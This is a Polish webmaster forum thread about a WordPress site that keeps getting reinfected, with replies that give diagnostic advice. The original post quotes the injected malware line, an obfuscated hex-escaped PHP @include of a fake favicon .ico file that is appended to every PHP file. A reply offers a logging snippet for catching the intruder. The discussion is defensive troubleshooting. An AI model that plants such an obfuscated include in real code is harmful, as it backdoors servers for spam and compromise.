Skocz do zawartości

Wordpress - ciągła infekcja pomysły?


stania.info
 Udostępnij

Rekomendowane odpowiedzi

Witam,
Na wstępie zaznaczę, ża art-ów o bezpieczeństwie wp przeczytałem dziesiątki.

 

Problem dotyczy jednej z domen z Wordpressem

  • prosta strona kilkanaście wpisów
  • wordpress aktualny (aktualizowany na bieżąco) 4.9
  • theme - darmowa skórka pobrana z repozytorium wp
  • z dodatkowych wtyczek WP Slick Slider (aktualizowany jak tylko wyskoczy powiadomienie)
  • rest API odłączone
  • xmlrpc odłączone
  • w logach nie znalazłem podejrzanych zapytań POST

 

Co kilka dni wraca mi infekcja, która dopisuje do plików *.php  (przez co admin odłącza mnie - wysyłany spam przez smtp ) mniej więcej podobny kod atakuje wszystkie pliki na serwerze.

/*5a4b5*/

@include "\x2fhome\x2fstan\x69apl/\x64omai\x6es/do\x33razy\x73ztuk\x61.pl/\x70ubli\x63_htm\x6c/wp-\x69nclu\x64es/i\x6dages\x2fwlw/\x66avic\x6fn_e0\x3787e.\x69co";

/*5a4b5*/

Oczyszczanie ręczne (po skanowaniu plików) nic nie daje, problem wracał po kilku dniach.

Wywaliłem wszystko, nowa czysta instalacja WP,  baza sprawdzona pod kontem dziwnych wpisów (brak ukrytego usera, do postów/stron - nie ma doklejonego JS)

Po kilku dniach infekcja wraca - opadam z sił czy może ktoś ma podobny problem?

 

Edytowane przez stania.info

Fotografia moją pasją - uwielbiam robić zdjęcia, dobre zdjęcia - Fotograf Zambrów

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli nie CMS, to zostaje hosting (bardziej prawdopodobne) ewentualnie maszyna na której działasz (mniej prawdopodobne).

Używasz jakiegoś klienta FTP? Też go sprawdź

Jeden seo rabin powie tak, a inny powie nie.

Zostałem SEMitą, żeby nawet w pracy siedzieć przy komputerze B)

Odnośnik do komentarza
Udostępnij na innych stronach

9 godzin temu, odys napisał:

Jeśli nie CMS, to zostaje hosting (bardziej prawdopodobne) ewentualnie maszyna na której działasz (mniej prawdopodobne).

Używasz jakiegoś klienta FTP? Też go sprawdź


Używam zawsze aktualnej wersji FileZilla infekcja zaczęła się na linuxpl -> czysta instalacja na innym serwerze po kilku dniach znowu infekcja.

@kayman  Dzięki wiem co jest includowane, te pseudo pliki .ico usunięte powracają jak bumerank - nie wiem czemu.

Oczywiście hosting twierdzi, że z ich strony jest wszystko OK.

 

Fotografia moją pasją - uwielbiam robić zdjęcia, dobre zdjęcia - Fotograf Zambrów

Odnośnik do komentarza
Udostępnij na innych stronach

2 godziny temu, stania.info napisał:

nie wiem czemu

zobacz jakimś notatnikiem co jest w favicon_e0787e.ico, jeżeli kod jest zaciemniony jak ta ścieżka to wiesz co zrobić

Odnośnik do komentarza
Udostępnij na innych stronach

7 minut temu, mamoczy napisał:

Zobacz czy w bazie danych nie siedzi furteczka.


Bazę przeglądam, nic podejrzanego nie widać, nie ma dodatkowych user-ów, do postów nie doklejono js ani kodu php

 

Fotografia moją pasją - uwielbiam robić zdjęcia, dobre zdjęcia - Fotograf Zambrów

Odnośnik do komentarza
Udostępnij na innych stronach

1 godzinę temu, stania.info napisał:

Zawartość pliku .ico

teraz w pliku favicon_e0787e.ico  zamiast tego kodu co jest wstaw kod do tworzący loga np

<?php 

$fp = fopen('mallwarelog.txt', 'w');
fwrite($fp, $_SERVER['REQUEST_URI'].PHP_EOL); // to jest twoja dziura
fwrite($fp, serialize($_POST).PHP_EOL); // to do przejrzenia
fwrite($fp, serialize($_GET).PHP_EOL); // to do przejrzenia
fclose($fp);
exit();

 jak się pojawi plik mallwarelog.txt będziesz wiedział co i jak

Edytowane przez kayman
Odnośnik do komentarza
Udostępnij na innych stronach

9 minut temu, stania.info napisał:

Za wiele informacji nie dostarczył log

bo to twoje wejście jest, poczekajmy na jego jak będzie chciał spamować

e:/ oglądaj ten plik od czasu do czasu

Edytowane przez kayman
Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
 Udostępnij

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności